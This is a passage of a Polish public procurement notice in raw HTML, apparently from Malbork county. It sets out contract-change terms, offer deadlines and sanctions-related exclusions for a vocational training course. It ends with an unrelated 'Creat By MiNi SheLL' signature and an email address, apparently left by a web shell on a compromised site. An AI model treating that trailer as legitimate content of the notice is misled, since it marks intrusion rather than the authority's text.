<br/>być poświadczone za zgodność z oryginałem przez osobę lub osoby upoważnione do <br/>reprezentowania tych Wykonawców.<br/>9. Przed podpisaniem umowy (w przypadku wygrania postępowania) Wykonawcy składający <br/>ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę konsorcjum, <br/>zawierającą, co najmniej:<br/>1) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim <br/>zakresem realizację przedmiotu zamówienia,<br/>2) określenie zakresu działania poszczególnych stron umowy, czas obowiązywania umowy, <br/>który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania <br/>gwarancji jakości i rękojmi. 10. Wszelka korespondencja prowadzona przez Zamawiającego będzie wyłącznie z pełnomocnikiem wykonawców wspólnie <br/>ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną <br/>wprowadzone do treści umowy.<br/>Zamawiający, zgodnie z art. 455 Ustawy Pzp, przewiduje możliwość dokonania zmian <br/>postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano <br/>wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych <br/>poniżej,<br/>z uwzględnieniem podawanych warunków ich wprowadzenia:<br/>1. W uzasadnionych przypadkach Zamawiający może wyrazić zgodę na wydłużenie/przesunięcie terminu realizacji usługi <br/>wynikającej z umowy, gdy będzie to podyktowane<br/>czynnikami niezależnymi od Wykonawcy, a Wykonawca wystąpi do Zamawiającego o <br/>wydłużenie/przesunięcie terminu realizacji usługi i szczegółowo to uzasadni. Powyższa zgoda <br/>jest uprawnieniem Zamawiającego, nie zaś jego obowiązkiem. W przypadku wyrażenia przez <br/>Zamawiającego zgody na przesunięcie/wydłużenie terminu realizacji usługi nie będą naliczane <br/>kary umowne.<br/>* Zamawiający zastrzega, iż termin realizacji usługi może ulec zmianie z uwagi na organicznie <br/>spowodowane pandemią COVID-19 i jej skutkami w przyszłości, które mogą bezpośrednio <br/>wpłynąć na realizację projektu pn. „Zostań ZAWODOWCEM” oraz z przyczyn natury <br/>organizacyjnej np. sytuacją niemożliwą do przewidzenia przez strony. – Wykonawcy w takiej <br/>sytuacji nie przysługuje prawo do roszczeń dodatkowego wynagrodzenia.<br/>2. Przesunięcie terminu za zgodą Zamawiającego jest również możliwe z przyczyn natury <br/>organizacyjnej, gdy będzie to korzystne dla uczestników kursu.<br/>3. Wykonawca może dokonać wymiany osób, które zaproponował jako szkoleniowców na <br/>kursie. W takiej sytuacji Wykonawca zobowiązany jest wskazać Zamawiającemu inną osobę <br/>o doświadczeniu nie niższym, niż wymagał tego Zamawiający w Specyfikacji Warunków <br/>Zamówienia. Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających <br/>bezpośrednio lub pośrednio z wymiany osób, wyznaczonych przez Wykonawcę do wykonania <br/>przedmiotu zamówienia. Zmiana kadry wymaga zgody Zamawiającego.<br/>4. W uzasadnionych przypadkach Wykonawca może dokonać zmiany miejsca realizacji kursu, <br/>przy czym lokalizacja nie może pozostawać w sprzeczności z wymaganiami Zamawiającego. <br/>Zmiana miejsca kursu wymaga zgody Zamawiającego.<br/>5. Zmiany umowy dopuszczalne są w następującym zakresie:<br/>1) w zakresie zmiany ilości uczestników objętych zamówieniem, w przypadku konieczności <br/>dokonania takiej zmiany leżącej po stronie Zamawiającego lub wynikającej z czynników <br/>zewnętrznych od niego niezależnych,<br/>2) w zakresie wartości umowy zamówienia, w przypadku zmiany ilości uczestników przez <br/>Zamawiającego – o wartość kwoty przeliczonej na osobę, określoną w Ofercie Wykonawcy. <br/>Strony dopuszczają możliwość wprowadzenia innych zmian które są konieczne do <br/>wprowadzenia, a nie dało się ich przewidzieć w chwili zawarcia umowy, a które to zmiany są <br/>korzystne dla Zamawiającego i zarazem nie spowodują istotnej zmiany zamówienia.<br/>6. Strony ustalają, że w przypadku gdyby realizacja zamówienia przestanie leżeć w interesie <br/>Zamawiającego, w tym w szczególności w przypadku rozwiązania przez Instytucję Zarządzającą <br/>umowy o dofinansowanie Projektu, Zamawiającemu przysługuje prawo odstąpienia od umowy <br/>w terminie 14 dni od dnia powzięcia informacji o przyczynie uzasadniającej odstąpienie.<br/>7. Wszystkie postanowienia wymienione w powyższych punktach stanowią katalog zmian, na <br/>które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia <br/>takiej zgody i nie mogą być podstawą roszczenia Wykonawcy o dokonanie zmian. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://powiat-malbork.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-20 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.7.	Na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835) z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Pzp wyklucza się: <br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com